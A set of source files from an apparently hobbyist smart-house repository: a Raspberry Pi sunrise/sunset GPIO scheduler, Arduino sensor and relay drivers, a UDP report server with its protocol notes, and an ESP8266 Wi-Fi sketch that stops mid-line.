"text": "#!/usr/bin/env python3\n\"A class to keep GPIO pin level according to sunlight calculation.\"\n\nimport datetime\nimport signal\nfrom time import sleep\nfrom sys import exit\nimport atexit\nimport argparse\nfrom astral import Astral\ntry:\n import RPi.GPIO as GPIO\nexcept RuntimeError:\n exit(\"Error importing RPi.GPIO! Try to run it as root!\")\n\nclass GpioOnSunSchedule:\n def __init__(self, city, gpio_pin, value_during_sun=False, default_value=True, interval=60, debug=False):\n '''\n Initialize a GpioOnSunSchedule object, with\n @city(String): name of your city\n @gpio_pin(Integer): GPIO output pin number on Raspberry Pi board (by board numbering)\n @value_during_sun: GPIO.LOW or GPIO.HIGH (False or True). Value of given pin when sun is in sky.\n @default_value: GPIO.LOW or GPIO.HIGH (False or True). Default value when GPIO pin is initialized. This can be used to avoid\n jitter (e.g. for low-triggering relays)\n @interval(Integer): time interval in seconds between two adjacent check.\n @debug(Boolean): whether to print debug information\n '''\n # Initialize Astral for sunrise/sunset time calculation\n self.astral = Astral()\n self.astral.solar_depression = 'civil'\n try:\n self.city = self.astral[city]\n except KeyError as err:\n exit('%s is not in Astral database. Try your capital city.' % city)\n # Initialize GPIO\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BOARD)\n # Save parameters for later usage\n self.gpio_pin = gpio_pin\n self.value_during_sun = value_during_sun\n self.default_value = default_value\n self.interval = interval # seconds\n self.debug = debug\n def __run(self):\n '''\n 'run' forever and set given GPIO pin to suitable value according to whether sun is up or not.\n '''\n current_value = self.default_value\n if self.debug:\n print(\"Setup GPIO pin {0} to OUT with initial value {1}.\".format(self.gpio_pin, current_value))\n GPIO.setup(self.gpio_pin, GPIO.OUT, initial=current_value)\n while True:\n # loop forever\n sun = self.city.sun(date=datetime.date.today(), local=True)\n sunrise, sunset = sun['sunrise'], sun['sunset']\n now = datetime.datetime.now(tz=sunrise.tzinfo)\n if self.debug:\n print(\"Today is {0}\".format(sun))\n print(\"Sunrise at {0}\".format(sunrise))\n print(\"Sunset at {0}\".format(sunset))\n print(\"Now is {0}\".format(now))\n if now > sunrise + datetime.timedelta(hours=0.5) and now < sunset - datetime.timedelta(hours=0.5):\n # sun is in the sky\n if self.debug:\n print(\"Sun is in the sky! GPIO pin #{0} is {1}.\".format(self.gpio_pin, current_value))\n if current_value != self.value_during_sun:\n current_value = self.value_during_sun\n GPIO.output(self.gpio_pin, current_value)\n if self.debug:\n print(\"Switch GPIO pin #{0} to {1}.\".format(self.gpio_pin, current_value))\n else:\n # sun is down\n if self.debug:\n print(\"Sun is down! 
GPIO pin #{0} is {1}.\".format(self.gpio_pin, current_value))\n if current_value == self.value_during_sun:\n current_value = not self.value_during_sun\n GPIO.output(self.gpio_pin, current_value)\n if self.debug:\n print(\"Switch GPIO pin #{0} to {1}.\".format(self.gpio_pin, current_value))\n if self.debug:\n print(\"Sleep {0} seconds...\".format(self.interval))\n sleep(self.interval)\n def run(self):\n try:\n self.__run()\n except KeyboardInterrupt:\n pass\n finally:\n self.clean()\n def clean(self):\n GPIO.cleanup()\n\ndef handler(signum, frame):\n o = frame.f_globals['gpioOnSunSchedule']\n o.clean()\n\nsignal.signal(signal.SIGTERM, handler)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--debug\", help=\"Enable debug output\", action=\"store_true\")\n parser.add_argument(\"-c\", \"--city\", help=\"Nearest capital city name\", type=str, default=\"Stockholm\")\n parser.add_argument(\"-p\", \"--pin\", help=\"GPIO pin number (BOARD mode) for output\", type=int, required=True)\n parser.add_argument(\"-s\", \"--sun_value\", help=\"GPIO pin output during sun is up\", type=bool, default=True)\n parser.add_argument(\"-d\", \"--default_value\", help=\"GPIO pin default output value\", type=bool, default=True)\n parser.add_argument(\"-i\", \"--interval\", help=\"Sleep time before wake up again to change GPIO output\", type=int, default=300)\n args = parser.parse_args()\n if args.debug:\n print(\"city is {0}\".format(args.city))\n print(\"GPIO pin is #{0}\".format(args.pin))\n print(\"sun_value is {0}\".format(args.sun_value))\n print(\"default_value is {0}\".format(args.default_value))\n gpioOnSunSchedule = GpioOnSunSchedule(args.city,\n args.pin,\n value_during_sun=args.sun_value,\n default_value=args.default_value,\n interval=args.interval,\n debug=args.debug)\n gpioOnSunSchedule.run()\n"
},
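The class above reduces to one astral lookup per loop iteration: fetch the city from Astral's built-in database, ask for today's sun times, and compare against now with a half-hour margin. That core calculation, isolated into a few lines using the same astral v1 API the script imports (the city name is just an example):

    import datetime
    from astral import Astral

    a = Astral()
    a.solar_depression = 'civil'
    city = a['Stockholm']            # raises KeyError if the city is not in Astral's database
    sun = city.sun(date=datetime.date.today(), local=True)
    now = datetime.datetime.now(tz=sun['sunrise'].tzinfo)
    # same half-hour margin around sunrise/sunset that __run() applies
    sun_is_up = (sun['sunrise'] + datetime.timedelta(hours=0.5) < now
                 < sun['sunset'] - datetime.timedelta(hours=0.5))
    print("sun is up:", sun_is_up)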
{
"alpha_fraction": 0.47194719314575195,
"alphanum_fraction": 0.5302530527114868,
"avg_line_length": 28.322580337524414,
"blob_id": "4e670b2097932858c7617d3a52d8676e2a006514",
"content_id": "2ade56e86e0fb19dd744a81eb3212952f8efe667",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 909,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 31,
"path": "/WifiCar/PiPin.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/* To save digital pin usage on Arduino, this library assumes analog pins\n are used instead.\n*/\n#include \"PiPin.h\"\n\n/****************************************************************************/\n\nPiPin::PiPin(int _in0, int _in1, int _in2):\n in0(_in0), in1(_in1), in2(_in2)\n{\n}\n\nvoid PiPin::init() {\n pinMode(in0, INPUT_PULLUP);\n pinMode(in1, INPUT_PULLUP);\n pinMode(in2, INPUT_PULLUP);\n}\n\nint PiPin::read() {\n byte first_read, second_read;\n boolean is_jitter = true;\n while (is_jitter) {\n first_read = (analogRead(in0)>512?1:0) | ((analogRead(in1)>512?1:0) << 1) | ((analogRead(in2)>512?1:0) << 2);\n delay(1);\n second_read = (analogRead(in0)>512?1:0) | ((analogRead(in1)>512?1:0) << 1) | ((analogRead(in2)>512?1:0) << 2);\n if (first_read == second_read) {\n is_jitter = false;\n }\n }\n return PIPIN_TO_PROTOCOL_OP_CODES[first_read];\n}\n"
},
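PiPin::read() debounces the 3-bit input by sampling all three pins, waiting 1 ms, sampling again, and only accepting the value once two consecutive reads agree. The same double-read idea as a tiny Python sketch, where sample is any callable returning the current 3-bit code (a stand-in for the three analogRead() calls):

    import time

    def stable_read(sample, settle_s=0.001):
        # loop until two consecutive samples agree, then trust the value
        while True:
            first = sample()
            time.sleep(settle_s)
            if sample() == first:
                return first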
{
"alpha_fraction": 0.545045018196106,
"alphanum_fraction": 0.5810810923576355,
"avg_line_length": 22.38596534729004,
"blob_id": "160d11e69971b5401d90f128d3617f61314137a6",
"content_id": "ebebf8578861c461aab06137210adda4fd29bc2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1332,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 57,
"path": "/LcdDisplay/TemperatureSensor.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n \n#include \"TemperatureSensor.h\"\n\nfloat get_temperature(OneWire* ds_p){\n //returns the temperature from one DS18S20 in DEG Celsius\n\n byte data[12];\n byte addr[8];\n\n if (!ds_p->search(addr))\n {\n //no more sensors on chain, reset search\n ds_p->reset_search();\n return -1000;\n }\n\n if (OneWire::crc8( addr, 7) != addr[7])\n {\n //Serial.println(\"CRC is not valid!\");\n return -1000;\n }\n\n if ( addr[0] != 0x10 && addr[0] != 0x28)\n {\n //Serial.print(\"Device is not recognized\");\n return -1000;\n }\n\n ds_p->reset();\n ds_p->select(addr);\n ds_p->write(0x44,1); // start conversion, with parasite power on at the end\n\n byte present = ds_p->reset();\n ds_p->select(addr); \n ds_p->write(0xBE); // Read Scratchpad\n\n for (int i = 0; i < 9; i++) { // we need 9 bytes\n data[i] = ds_p->read();\n }\n\n ds_p->reset_search();\n\n byte MSB = data[1];\n byte LSB = data[0];\n\n float tempRead = ((MSB << 8) | LSB); //using two's compliment\n float TemperatureSum = tempRead / 16;\n\n return TemperatureSum;\n}"
},
{
"alpha_fraction": 0.6266476511955261,
"alphanum_fraction": 0.6469540596008301,
"avg_line_length": 35.441558837890625,
"blob_id": "27a596b6b048414400563099903b0a5c63530c65",
"content_id": "b20d8cee72e125d50c36b320446e805a2ecd70f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2807,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 77,
"path": "/MowerRobot/UltraSonicSensorProxy/UltraSonicSensorProxy.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n UltraSonicSensorProxy uses a Arduino Nano or Pro Mini to connect to ultrasonic sensors etc.\n Then it is connected back to the main Arduino Uno through I2C bus, as a slave.\n\n There are six ultrasonic sensors: head, head-left, head-right, tail, tail-left, \n tail-right. They are seperated 60 degrees from each other.\n\n Connections:\n For all ultrasonic sensors:\n VCC <-> 5V\n GND <-> GND\n head sensor: Trig <-> PIN_D2, Echo <-> PIN_D3\n head-left: Trig <-> PIN_D4, Echo <-> PIN_D5\n head-right: Trig <-> PIN_D6, Echo <-> PIN_D7\n tail sensor: Trig <-> PIN_D8, Echo <-> PIN_D9\n tail-left: Trig <-> PIN_D10, Echo <-> PIN_D11\n tail-right: Trig <-> PIN_D12, Echo <-> PIN_D13\n\n I2C communication protocol:\n Address of this slave: 0x10;\n All distances are measured in centimeter;\n Initial state after boot-up: all thresholds of six sensors are set to maximum\n After boot-up:\n onReceive: two bytes used, the first is sensorIndex, the second is threshold to set\n onRequest: UltraSonicSensorNumber number of bytes returned, sorted by their index\n*/\n\n#include <Arduino.h>\n#include <Wire.h>\n#include \"constants.h\"\n\nuint8_t thresholds[UltraSonicSensorNumber] = {255};\nuint8_t distances[UltraSonicSensorNumber] = {255};\nuint8_t trigPins[UltraSonicSensorNumber];\nuint8_t echoPins[UltraSonicSensorNumber];\n\nvoid setup() {\n Wire.begin(UltraSonicSensorProxyAddress);\n Wire.onReceive(set_threshold);\n Wire.onRequest(get_distances);\n int i;\n for (i=0; i<UltraSonicSensorNumber; i++) {\n trigPins[i] = 2 * i + 2;\n pinMode(trigPins[i], OUTPUT);\n echoPins[i] = 2 * i + 3;\n pinMode(echoPins[i], INPUT);\n }\n}\n\nvoid loop() {\n int sensorIndex;\n unsigned long distance;\n for (sensorIndex=0; sensorIndex<UltraSonicSensorNumber; sensorIndex++) {\n digitalWrite(trigPins[sensorIndex], LOW);\n delayMicroseconds(2);\n digitalWrite(trigPins[sensorIndex], HIGH);\n delayMicroseconds(12);\n digitalWrite(trigPins[sensorIndex], LOW);\n distance = pulseIn(echoPins[sensorIndex], HIGH, UltraSonicSensorTimeOut) / 29 / 2;\n distances[sensorIndex] = distance > 255 ? 255 : (uint8_t)distance;\n }\n delay(60); // do not trigger too frequently\n}\n\nvoid set_threshold(int numBytes) {\n // the first byte identifies which sensor to apply the threshold\n // the second byte tells how much to set as threshold\n uint8_t sensorIndex = Wire.read();\n uint8_t threshold = Wire.read();\n if (sensorIndex < UltraSonicSensorNumber) {\n thresholds[sensorIndex] = threshold;\n }\n}\n\nvoid get_distances() {\n Wire.write(distances, UltraSonicSensorNumber);\n}\n\n"
},
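The comment block in that sketch fixes the I2C contract: slave address 0x10, a two-byte write of (sensorIndex, threshold), and a read returning one distance byte per sensor in index order. A hedged master-side counterpart for a Raspberry Pi using smbus2 raw transactions (the library choice and bus number 1 are assumptions, not from the source):

    from smbus2 import SMBus, i2c_msg

    PROXY_ADDR = 0x10    # UltraSonicSensorProxyAddress per the sketch's comments
    SENSOR_COUNT = 6     # six ultrasonic sensors

    with SMBus(1) as bus:
        # onReceive side: exactly two bytes, (sensorIndex, threshold in cm)
        bus.i2c_rdwr(i2c_msg.write(PROXY_ADDR, [0, 50]))   # sensor 0, threshold 50 cm
        # onRequest side: SENSOR_COUNT distance bytes, sorted by sensor index
        read = i2c_msg.read(PROXY_ADDR, SENSOR_COUNT)
        bus.i2c_rdwr(read)
        distances = list(read)
        print(distances)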
{
"alpha_fraction": 0.6115503907203674,
"alphanum_fraction": 0.6304572224617004,
"avg_line_length": 56.60396194458008,
"blob_id": "b3c5a41e95684a7f9afc6d1c832236d184020383",
"content_id": "b72f47830ce725594469e72a09cc8ebae2516782",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5818,
"license_type": "no_license",
"max_line_length": 139,
"num_lines": 101,
"path": "/WebInterface/python/UdpServer.py",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#!/bin/env python3\n'''\nUdpServer class that receives all packets from Arduino's and update database.\n\nAll clients have to follow this format when sending to this server:\n 1. Use UDP\n 2. Port 9999\n 3. Communication protocol (version 0.1):\n 1) syntax (all letters are case sensitive)\n All fields are separated by a \";\", and usage of \";\" within any field is forbidden. A datagram must be ended with an \";\". Each\n field is a ASCII string. The first field is <operation>, which must be one of \"REPORT\" or \"CMD\".\n When <operation>=\"REPORT\", datagram is composed of 1+1+2*n (n=1,2,...) fields in order of \"REPORT\", <ID>, (<type>, <value>)+:\n <ID>: identity of the client, usually a geometry location name of an Arduino, e.g. \"KitchenWindow\", \"FrontYard\"\n <type>: type of report, i.e. what the <value> field in this report refers to, e.g. \"Temperature\", \"InternetConnectivity\"\n <value>: integer in unit of 0.001, e.g. \"-1800\" means -18.00\n Example: \"REPORT;KitchenWindow;Temperature;2300;Relay;100\", means the sender \"KitchenWindow\" reports a temperature at 23.00\n degree Celsius and its relay at value 1.00 (ON).\n When <operation>=\"CMD\", the datagram is composed of a string. Each char in the string represents one command.:\n <cmd>: the command receiver should execute.\n Example: \"CMD;d12ksdi\"\n 2) semantics\n client -> server: only \"REPORT\" operation is supported, e.g. \"REPORT;Doorstep;Temperature;-1900\", means client named \"Doorstep\"\n reports a temperature at -19.00 degree Celsius. How server uses the content of this report is completely up to the server.\n server -> client: only \"CMD\" operation is supported, e.g. \"CMD;d\". Mapping of char and commands:\n char commands/function calls\n d delay(500)\n 3) timing\n A TIMEOUT of 4 seconds is applied to each receiving attempt, if no response is received before timeout, operator should just\n reset its status and try again later (ideally a counter of consecutive timeout should also be maintained).\n Server should always listen, and any operation to handle a incoming datagram should take no more than TIMEOUT/2 in time. Server\n only responses to incoming datagram and then sends a datagram as response.\n Client sends one REPORT datagram to server every PERIOD (=60 second) or when an significant event happened, e.g. LightSensor\n threshold is reached, etc. When client sends a report, it waits for an response which is a \"CMD\" datagram, and executes <cmd>\n in the datagram.\n'''\nimport logging\nimport db\nimport socketserver\nimport argparse\nfrom time import sleep\n\nHOST = \"0.0.0.0\"\nPORT = 9999\nENCODING = \"ASCII\"\ncount = 0\n\nclass RaspberryPiHandler(socketserver.BaseRequestHandler):\n \"\"\"\n Handles one incoming datagram.\n \"\"\"\n def handle(self):\n logging.info(\"On socket({}) received \\\"{}\\\"\".format(self.request[1], self.request[0]))\n logging.debug(\"type(self.request[0])={}\".format(type(self.request[0])))\n datagram = self.request[0].decode(encoding=ENCODING).strip().split(';')\n for i in range(datagram.count('')):\n datagram.remove('') # remove empty items\n relay = 0\n # check if incoming datagram is legal\n if len(datagram) < 1 + 1 + 2: # minimum datagram: \"<operation>;<ID>;<type>;<value>\"\n logging.warning(\"Incoming datagram is too short (len={})! 
{}\".format(len(datagram), ';'.join(datagram)))\n elif datagram[0] != \"REPORT\": # only <operation>=\"REPORT\" is supported for client->server communication\n logging.debug(\"<operation>={}\".format(datagram[0]))\n logging.warning(\"Incoming datagram has unsupported <operation>=\\\"{}\\\"! {}\".format(datagram[0], ';'.join(datagram)))\n elif (len(datagram) - 2) % 2 != 0: # <type>;<value> are pairs\n logging.debug(datagram)\n logging.warning(\"Incoming datagram has wrong number of fields (len={})! {}\".format(len(datagram), ';'.join(datagram)))\n else: # basic check passed\n logging.info(\"Incoming datagram: {}\".format(';'.join(datagram)))\n operation, id = datagram[0:2]\n type_value_list = datagram[2:]\n for i in range(0, len(type_value_list), 2):\n db.DB().insert(id, type_value_list[i], float(type_value_list[i+1])/10000)\n if type_value_list[0] == \"Relay\":\n relay = float(type_value_list[1]) / 100\n # send a CMD datagram back\n # TODO: add real logic, for now only empty cmd is sent.\n if relay:\n cmd = \"relay_off();\"\n else:\n cmd = \"relay_on();\"\n socket = self.request[1]\n global count\n count += 1\n cmd = \"CMD;{}\".format(count)\n sleep(0.5)\n socket.sendto(cmd.encode(encoding=ENCODING), self.client_address)\n logging.info(\"Sent \\\"{}\\\"\".format(cmd))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbosity\", help=\"verbosity of logging output [0..4]\", action=\"count\", default=0)\n args = parser.parse_args()\n if args.verbosity > 4:\n args.verbosity = 4\n log_lvl = (logging.CRITICAL, logging.ERROR, logging.WARNING, logging.INFO, logging.DEBUG)[args.verbosity]\n logging.basicConfig(level=log_lvl, format='%(filename)s:%(levelname)s:%(message)s')\n logging.info(\"Starting UdpServer instance...\")\n server = socketserver.UDPServer((HOST, PORT), RaspberryPiHandler)\n logging.info(\"UdpServer instance started.\")\n logging.info(\"Let UdpServer to serve forever ...\")\n server.serve_forever()\n"
},
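Seen from the client side, the protocol in that docstring needs only a UDP socket: send one REPORT datagram, then wait out the 4-second TIMEOUT for the CMD reply. A minimal client sketch against a local server (the field values are the docstring's own example):

    import socket

    TIMEOUT = 4.0      # per the protocol's timing section
    report = "REPORT;KitchenWindow;Temperature;2300;Relay;100"

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(TIMEOUT)
    s.sendto(report.encode("ascii"), ("localhost", 9999))
    try:
        reply, addr = s.recvfrom(1024)
        print("server said:", reply.decode("ascii"))   # e.g. "CMD;1"
    except socket.timeout:
        print("no CMD reply before timeout; reset and retry later")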
{
"alpha_fraction": 0.5560298562049866,
"alphanum_fraction": 0.5688366889953613,
"avg_line_length": 16.679244995117188,
"blob_id": "748925a8e0ba0ae48d3870d22fa2826af1844f62",
"content_id": "1f4ca5df6424f56342e804d1c4e072be387e6d0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 937,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 53,
"path": "/lib/Relay/Relay.cpp",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n */\n\n#include \"Relay.h\"\n\n/****************************************************************************/\nRelay::Relay(uint8_t __pin, uint8_t __on_lvl):\n _pin(__pin), _on_lvl(__on_lvl)\n{\n}\n\nvoid Relay::begin(uint8_t default_lvl)\n{\n pinMode(_pin, OUTPUT);\n digitalWrite(_pin, default_lvl);\n _cur_lvl = default_lvl;\n}\n\nvoid Relay::on(void)\n{\n digitalWrite(_pin, _on_lvl);\n _cur_lvl = _on_lvl;\n}\n\nvoid Relay::off(void)\n{\n digitalWrite(_pin, !_on_lvl);\n _cur_lvl = !_on_lvl;\n}\n\nuint8_t Relay::cur_lvl(void)\n{\n return _cur_lvl;\n}\n\nvoid Relay::on_lvl(uint8_t __on_lvl)\n{\n _on_lvl = __on_lvl;\n}\nuint8_t Relay::on_lvl(void)\n{\n return _on_lvl;\n}\n\nuint8_t Relay::pin(void)\n{\n return _pin;\n}\n"
},
{
"alpha_fraction": 0.6211538314819336,
"alphanum_fraction": 0.6461538672447205,
"avg_line_length": 21.521739959716797,
"blob_id": "552d0d3334eb8566bac0f96173d10eab52152316",
"content_id": "3a1f67d9cf495c05e1d60f3c04cd6c61713608fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 520,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 23,
"path": "/ArduinoController/TemperatureSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n \n Connection:\n # DS18B20\n GND -> GND\n VDD -> 5V\n DQ -> 4.7 kOhm -> 5V\n */\n\n#ifndef __TEMPERATURESENSOR_H__\n#define __TEMPERATURESENSOR_H__\n\n#include <Arduino.h>\n#include <OneWire.h>\n\nfloat get_temperature(OneWire* ds_p);\n\n#endif // __TEMPERATURESENSOR_H__\n\n\n"
},
{
"alpha_fraction": 0.653030276298523,
"alphanum_fraction": 0.6621212363243103,
"avg_line_length": 18.352941513061523,
"blob_id": "46df8848e60fc91ac7dd79a2a171ec0bb619a5f8",
"content_id": "9c31814adebf626e54cc0b1d1cd9ce9276b293c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 660,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 34,
"path": "/lib/LightSensor/LightSensor.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "/*\n Copyright (C) 2014 Michael Duo Ling <[email protected]>\n\n This program is free software; you can redistribute it and/or\n modify it under the terms of the GNU General Public License\n version 2 as published by the Free Software Foundation.\n \n Connection:\n VCC -> 5V\n GND -> GND\n DO -> any digital INPUT pin\n */\n\n#ifndef __LIGHTSENSOR_H__\n#define __LIGHTSENSOR_H__\n\n#define LIGHTSENSOR_LIGHT LOW\n#define LIGHTSENSOR_DARK HIGH\n\n#include <Arduino.h>\n\nclass LightSensor\n{\nprivate:\n unsigned int _pin;\n\npublic:\n LightSensor(unsigned int __pin);\n unsigned int pin(void);\n void begin(void);\n bool get(void);\n};\n\n#endif // __LIGHTSENSOR_H__\n\n\n"
},
{
"alpha_fraction": 0.6725228428840637,
"alphanum_fraction": 0.676036536693573,
"avg_line_length": 25.830188751220703,
"blob_id": "e7840319dbaa570e61fdf386b7c7909f72324ad4",
"content_id": "a52d07753480ab77331a86dd12f04eaaa6a4c602",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1423,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 53,
"path": "/elSkateboard/Logger.h",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "\n#ifndef __LOGGER_H__\n#define __LOGGER_H__\n\n#include <Arduino.h>\n#include <FileIO.h>\n\n#define LOGGER_BUFFER_LEN_BITS 3\n#define LOGGER_BUFFER_LENGTH (1 << LOGGER_BUFFER_LEN_BITS)\n#define LOGGER_BUFFER_INDEX_MASK ((1 << LOGGER_BUFFER_LEN_BITS) - 1)\n#define LOGGER_DEFAULT_FILE_NAME \"/mnt/sda1/logs/ArduinoLogs.txt\"\n\nenum LogType {\n EMPTY,\n VOLTAGE_OVERALL, // overall system voltage, measured directly from battery\n CURRENT_OVERALL // overall system current, measured directly from battery\n};\n\nstruct LogS {\n long timeMs; // in millisecond\n byte type; // refer to defined types below\n float value; // refer to defined types below\n};\n\nclass Logger {\n private:\n String fileName;\n LogS logs[LOGGER_BUFFER_LENGTH];\n volatile byte entryNum;\n volatile byte writeIndex;\n volatile byte readIndex;\n public:\n Logger(String _fileName=LOGGER_DEFAULT_FILE_NAME);\n\n /*\n * Remove log file if it exist.\n */\n void clearFile();\n\n /*\n * Write log entry in memory, ideal to call from ISR.\n */\n void writeToMem(long timeMs, byte type, float value);\n\n /*\n * Write available log entries to file. This should not be called from an ISR,\n * instead it should be called from loop() method.\n * This can be called every loop() since nothing will be done if there's no\n * available log entry to write to file system.\n */\n void writeToFile();\n};\n\n#endif // __LOGGER_H__\n"
},
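The three LOGGER_BUFFER macros encode the usual power-of-two ring-buffer trick: with a length of 1 << LEN_BITS, ANDing an ever-growing index with (length - 1) wraps it around without a division, which is cheap enough to do inside an ISR. The same arithmetic in a few lines of Python:

    LEN_BITS = 3
    LENGTH = 1 << LEN_BITS    # 8 slots, like LOGGER_BUFFER_LENGTH
    MASK = LENGTH - 1         # 0b111, like LOGGER_BUFFER_INDEX_MASK

    for write_index in range(20):
        slot = write_index & MASK    # same as write_index % LENGTH, but a single AND
        # slot cycles 0..7, 0..7, ... so new entries overwrite the oldest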
{
"alpha_fraction": 0.5749250650405884,
"alphanum_fraction": 0.6383616328239441,
"avg_line_length": 26.77777862548828,
"blob_id": "094f60bfec5f9509ad287c9d42fc5fdea5aac39e",
"content_id": "5e53c429aca3a06142712c2c2d7eee5ef2e09895",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2002,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 72,
"path": "/elSkateboard/elSkateboard.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#include \"TimerOne.h\"\n#include \"VoltageSensor.h\"\n#include \"CurrentSensor.h\"\n#include \"Logger.h\"\n\n// Debug flags\n#define ENABLE_DEBUG // enable this line if get debug print\n#define DEBUG_CONSOLE // enable this line if Yun shield is used\n#ifdef ENABLE_DEBUG\n #ifdef DEBUG_CONSOLE\n #include <Console.h>\n #define DDD Console\n #else\n #define DDD Serial\n #endif // DEBUG_CONSOLE\n#endif // ENABLE_DEBUG\n\n/*\n * Timer based interrupt\n * with 32ms as period, we can achieve following timer period by:\n * if ((++timerCount) & 0x1 == 0): every 32ms * 2 = 64ms\n * if ((++timerCount) & 0x3 == 0): every 32ms * 4 = 128ms\n * if ((++timerCount) & 0x7 == 0): every 32ms * 8 = 256ms\n * if ((++timerCount) & 0x15 == 0): every 32ms * 16 = 512ms = 0.512s\n * if ((++timerCount) & 0x31 == 0): every 32ms * 32 = 1024ms = 1.024s\n * if ((++timerCount) & 0x63 == 0): every 32ms * 64 = 2048ms = 2.048s\n * if ((++timerCount) & 0x127 == 0): every 32ms * 128 = 4096ms = 4.096s\n * if (++timerCount == 0): every 32ms * 256 = 8192ms = 8.192s\n */\n#define TIMER_PERIOD 32 // timer pops up every 32 ms\nvolatile byte timerCount = 0;\nvolatile boolean flagReadVoltage = false;\nvolatile boolean flagReadCurrent = false;\n\n// voltage sensor on analog pin 0\nVoltageSensor volt(0);\n// current sensor on analog pin 1\nCurrentSensor amp(1);\nLogger logger;\n\nvoid setup() {\n Timer1.initialize(TIMER_PERIOD * 1000);\n Timer1.attachInterrupt(timerIsr);\n #ifdef ENABLE_DEBUG\n #ifdef DEBUG_CONSOLE\n Bridge.begin();\n DDD.begin();\n #else\n DDD.begin(9600);\n #endif\n #endif\n\n #ifdef BRIDGE_H_ // Bridge is used\n Bridge.begin();\n #endif\n #ifdef __FILEIO_H__ // FileIO is used\n FileSystem.begin();\n #endif\n}\n\nvoid loop() {\n logger.writeToFile();\n}\n\nvoid timerIsr() {\n if (++timerCount == 0) {\n // log VOLTAGE_OVERALL\n logger.writeToMem(millis(), VOLTAGE_OVERALL, volt.read());\n // log CURRENT_OVERALL\n logger.writeToMem(millis(), CURRENT_OVERALL, amp.read());\n }\n}\n\n\n"
},
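The mask table in that sketch is just powers of two over the 32 ms base tick, so it can be cross-checked mechanically:

    TIMER_PERIOD_MS = 32
    for bits in range(1, 9):
        mask = (1 << bits) - 1    # 0x1, 0x3, 0x7, 0xF, 0x1F, 0x3F, 0x7F, 0xFF
        print("count & 0x%X == 0 -> every %d ms" % (mask, TIMER_PERIOD_MS * (1 << bits)))

For a byte-sized counter the last row (mask 0xFF) is the same as the sketch's `if (++timerCount == 0)` test: both fire once every 256 ticks.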
{
"alpha_fraction": 0.5075311064720154,
"alphanum_fraction": 0.5776031613349915,
"avg_line_length": 19.917808532714844,
"blob_id": "7d703d571944ae98aaeea5c428115a91fdea8c48",
"content_id": "efdbd7f078a89bfc547b2c55abd6e99712e9985e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1527,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 73,
"path": "/ArduinoNano/ArduinoNano.ino",
"repo_name": "MichaelLing83/pysmarthouse",
"src_encoding": "UTF-8",
"text": "#include <SoftwareSerial.h>\n\n#define SSID \"michael\" // insert your SSID\n#define PASS \"waterpigs\" // insert your password\n#define DST_IP \"192.168.31.107\" //RaspberryPi\n\nSoftwareSerial esp8266(10, 11); // RX, TX\n\nvoid setup()\n{\n Serial.begin(9600);\n esp8266.begin(9600);\n sendDebug(\"AT+RST\"); // reset\n delay(2000);\n sendDebug(\"AT\");\n sendDebug(\"ATE0\"); // disable echo\n connectWiFi();\n sendDebug(\"AT+CIPSTATUS\");\n \n sendDebug(\"AT+CIPSTART=\\\"UDP\\\",\\\"192.168.31.107\\\",9999\");\n}\n\nvoid loop()\n{\n //char cmd[30] = \"Kitchen;Temperature;-1900\";\n String data = \"Kitchen;Temperature;-1900\";\n String cmd = \"AT+CIPSEND=\";\n cmd += data.length();\n esp8266.println(cmd);\n Serial.println(cmd);\n if (esp8266.find(\">\")) {\n Serial.print(\">\");\n esp8266.print(data);\n Serial.println(data);\n } else {\n sendDebug(\"AT+CIPCLOSE\");\n }\n delay(2000);\n}\n\nvoid sendDebug(String cmd){\n esp8266.println(cmd);\n Serial.println(cmd);\n delay(1000);\n char tmp;\n tmp = 